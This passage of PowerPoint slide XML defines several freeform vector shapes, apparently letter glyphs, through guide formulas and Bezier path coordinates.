                <a:gd name="T28" fmla="*/ 0 w 230"/>
                <a:gd name="T29" fmla="*/ 242 h 316"/>
                <a:gd name="T30" fmla="*/ 61 w 230"/>
                <a:gd name="T31" fmla="*/ 316 h 316"/>
                <a:gd name="T32" fmla="*/ 123 w 230"/>
                <a:gd name="T33" fmla="*/ 281 h 316"/>
                <a:gd name="T34" fmla="*/ 181 w 230"/>
                <a:gd name="T35" fmla="*/ 316 h 316"/>
                <a:gd name="T36" fmla="*/ 229 w 230"/>
                <a:gd name="T37" fmla="*/ 258 h 316"/>
                <a:gd name="T38" fmla="*/ 215 w 230"/>
                <a:gd name="T39" fmla="*/ 242 h 316"/>
                <a:gd name="T40" fmla="*/ 201 w 230"/>
                <a:gd name="T41" fmla="*/ 257 h 316"/>
                <a:gd name="T42" fmla="*/ 181 w 230"/>
                <a:gd name="T43" fmla="*/ 286 h 316"/>
                <a:gd name="T44" fmla="*/ 139 w 230"/>
                <a:gd name="T45" fmla="*/ 257 h 316"/>
                <a:gd name="T46" fmla="*/ 165 w 230"/>
                <a:gd name="T47" fmla="*/ 204 h 316"/>
                <a:gd name="T48" fmla="*/ 195 w 230"/>
                <a:gd name="T49" fmla="*/ 126 h 316"/>
                <a:gd name="T50" fmla="*/ 73 w 230"/>
                <a:gd name="T51" fmla="*/ 129 h 316"/>
                <a:gd name="T52" fmla="*/ 65 w 230"/>
                <a:gd name="T53" fmla="*/ 73 h 316"/>
                <a:gd name="T54" fmla="*/ 89 w 230"/>
                <a:gd name="T55" fmla="*/ 31 h 316"/>
                <a:gd name="T56" fmla="*/ 107 w 230"/>
                <a:gd name="T57" fmla="*/ 69 h 316"/>
                <a:gd name="T58" fmla="*/ 73 w 230"/>
                <a:gd name="T59" fmla="*/ 129 h 316"/>
                <a:gd name="T60" fmla="*/ 63 w 230"/>
                <a:gd name="T61" fmla="*/ 185 h 316"/>
                <a:gd name="T62" fmla="*/ 83 w 230"/>
                <a:gd name="T63" fmla="*/ 221 h 316"/>
                <a:gd name="T64" fmla="*/ 105 w 230"/>
                <a:gd name="T65" fmla="*/ 257 h 316"/>
                <a:gd name="T66" fmla="*/ 62 w 230"/>
                <a:gd name="T67" fmla="*/ 286 h 316"/>
                <a:gd name="T68" fmla="*/ 34 w 230"/>
                <a:gd name="T69" fmla="*/ 241 h 316"/>
                <a:gd name="T70" fmla="*/ 63 w 230"/>
                <a:gd name="T71" fmla="*/ 185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30" h="316">
                  <a:moveTo>
                    <a:pt x="195" y="126"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="210" y="126"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="126"/>
                    <a:pt x="230" y="126"/>
                    <a:pt x="230" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="96"/>
                    <a:pt x="218" y="96"/>
                    <a:pt x="210" y="96"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="164" y="96"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="96"/>
                    <a:pt x="144" y="96"/>
                    <a:pt x="144" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="126"/>
                    <a:pt x="156" y="126"/>
                    <a:pt x="165" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="162"/>
                    <a:pt x="135" y="204"/>
                    <a:pt x="121" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="220"/>
                    <a:pt x="95" y="189"/>
                    <a:pt x="85" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="110"/>
                    <a:pt x="135" y="80"/>
                    <a:pt x="135" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="38"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="89" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="37" y="23"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="94"/>
                    <a:pt x="41" y="122"/>
                    <a:pt x="51" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="158"/>
                    <a:pt x="18" y="189"/>
                    <a:pt x="17" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="202"/>
                    <a:pt x="0" y="219"/>
                    <a:pt x="0" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="280"/>
                    <a:pt x="23" y="316"/>
                    <a:pt x="61" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="316"/>
                    <a:pt x="108" y="300"/>
                    <a:pt x="123" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="291"/>
                    <a:pt x="152" y="316"/>
                    <a:pt x="181" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="316"/>
                    <a:pt x="229" y="282"/>
                    <a:pt x="229" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="242"/>
                    <a:pt x="216" y="242"/>
                    <a:pt x="215" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="242"/>
                    <a:pt x="201" y="255"/>
                    <a:pt x="201" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="279"/>
                    <a:pt x="189" y="286"/>
                    <a:pt x="181" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="286"/>
                    <a:pt x="144" y="263"/>
                    <a:pt x="139" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="239"/>
                    <a:pt x="160" y="216"/>
                    <a:pt x="165" y="204"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="126"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="103"/>
                    <a:pt x="65" y="77"/>
                    <a:pt x="65" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="44"/>
                    <a:pt x="78" y="31"/>
                    <a:pt x="89" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="31"/>
                    <a:pt x="107" y="64"/>
                    <a:pt x="107" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="83"/>
                    <a:pt x="98" y="101"/>
                    <a:pt x="73" y="129"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="185"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="193"/>
                    <a:pt x="76" y="209"/>
                    <a:pt x="83" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="240"/>
                    <a:pt x="97" y="245"/>
                    <a:pt x="105" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="283"/>
                    <a:pt x="69" y="286"/>
                    <a:pt x="62" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="286"/>
                    <a:pt x="34" y="254"/>
                    <a:pt x="34" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="217"/>
                    <a:pt x="40" y="211"/>
                    <a:pt x="63" y="18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03" name="Freeform 194">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F34AAA5-9F66-449E-91AC-A34E3FAA72A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId90"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1746250" y="1930400"/>
              <a:ext cx="92075" cy="131763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 239"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 239"/>
                <a:gd name="T5" fmla="*/ 33 h 335"/>
                <a:gd name="T6" fmla="*/ 149 w 239"/>
                <a:gd name="T7" fmla="*/ 83 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 239"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 239"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 83 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 31 h 335"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 48 h 335"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 239"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 83 h 335"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 262 h 335"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 262 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 205 h 335"/>
                <a:gd name="T46" fmla="*/ 125 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 262 h 335"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 227 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 239"/>
                <a:gd name="T65" fmla="*/ 219 h 335"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 262 h 335"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 30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9" h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="55"/>
                    <a:pt x="76" y="33"/>
                    <a:pt x="102" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="33"/>
                    <a:pt x="149" y="56"/>
                    <a:pt x="149" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="111"/>
                    <a:pt x="127" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="68"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="48"/>
                    <a:pt x="219" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="48"/>
                    <a:pt x="239" y="42"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="150" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="124" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="35" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="25" y="149"/>
                    <a:pt x="25" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="52" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="232" y="304"/>
                    <a:pt x="232" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="125" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="305"/>
                    <a:pt x="29" y="284"/>
                    <a:pt x="29" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="253"/>
                    <a:pt x="33" y="237"/>
                    <a:pt x="49" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="219"/>
                    <a:pt x="66" y="219"/>
                    <a:pt x="103" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="219"/>
                    <a:pt x="203" y="219"/>
                    <a:pt x="203" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="284"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="30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04" name="Freeform 195">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{132D50AB-32BF-480B-8EA2-91303102CB87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId91"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1844675" y="1931988"/>
              <a:ext cx="95250" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 192 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 229 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 199 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 184 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 249"/>
                <a:gd name="T11" fmla="*/ 184 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 249"/>
                <a:gd name="T13" fmla="*/ 20 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 150 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 15 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 30 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 30 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 136 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 77 w 249"/>
                <a:gd name="T31" fmla="*/ 20 h 218"/>
                <a:gd name="T32" fmla="*/ 57 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 15 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 30 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 30 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 172 w 249"/>
                <a:gd name="T47" fmla="*/ 199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9" h="218">
                  <a:moveTo>
                    <a:pt x="172" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="183" y="215"/>
                    <a:pt x="192" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="215"/>
                    <a:pt x="249" y="215"/>
                    <a:pt x="249" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="184"/>
                    <a:pt x="236" y="184"/>
                    <a:pt x="229" y="184"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="30"/>
                    <a:pt x="143" y="30"/>
                    <a:pt x="150" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="181"/>
                    <a:pt x="132" y="187"/>
                    <a:pt x="116" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="187"/>
                    <a:pt x="77" y="171"/>
                    <a:pt x="77" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="77" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="172" y="19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05" name="Freeform 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76E582F-7715-4AB8-8974-0FB9429D900B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId92"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1957387" y="1895475"/>
              <a:ext cx="73025" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 116 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 306"/>
                <a:gd name="T2" fmla="*/ 96 w 188"/>
                <a:gd name="T3" fmla="*/ 91 h 306"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 91 h 306"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 106 h 306"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 306"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 306"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 306"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 306"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 291 h 306"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 306 h 306"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 306 h 306"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 291 h 306"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 306"/>
                <a:gd name="T26" fmla="*/ 116 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 306"/>
                <a:gd name="T28" fmla="*/ 116 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 306"/>
                <a:gd name="T30" fmla="*/ 116 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 306"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 306"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 306"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 306"/>
                <a:gd name="T38" fmla="*/ 116 w 188"/>
                <a:gd name="T39" fmla="*/ 25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8" h="306">
                  <a:moveTo>
                    <a:pt x="116" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="96"/>
                    <a:pt x="113" y="91"/>
                    <a:pt x="96" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="306"/>
                    <a:pt x="13" y="306"/>
                    <a:pt x="21" y="306"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="306"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="306"/>
                    <a:pt x="188" y="306"/>
                    <a:pt x="188" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="11"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="77" y="50"/>
                    <a:pt x="91" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="50"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116"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06" name="Freeform 197">
              <a:extLst>
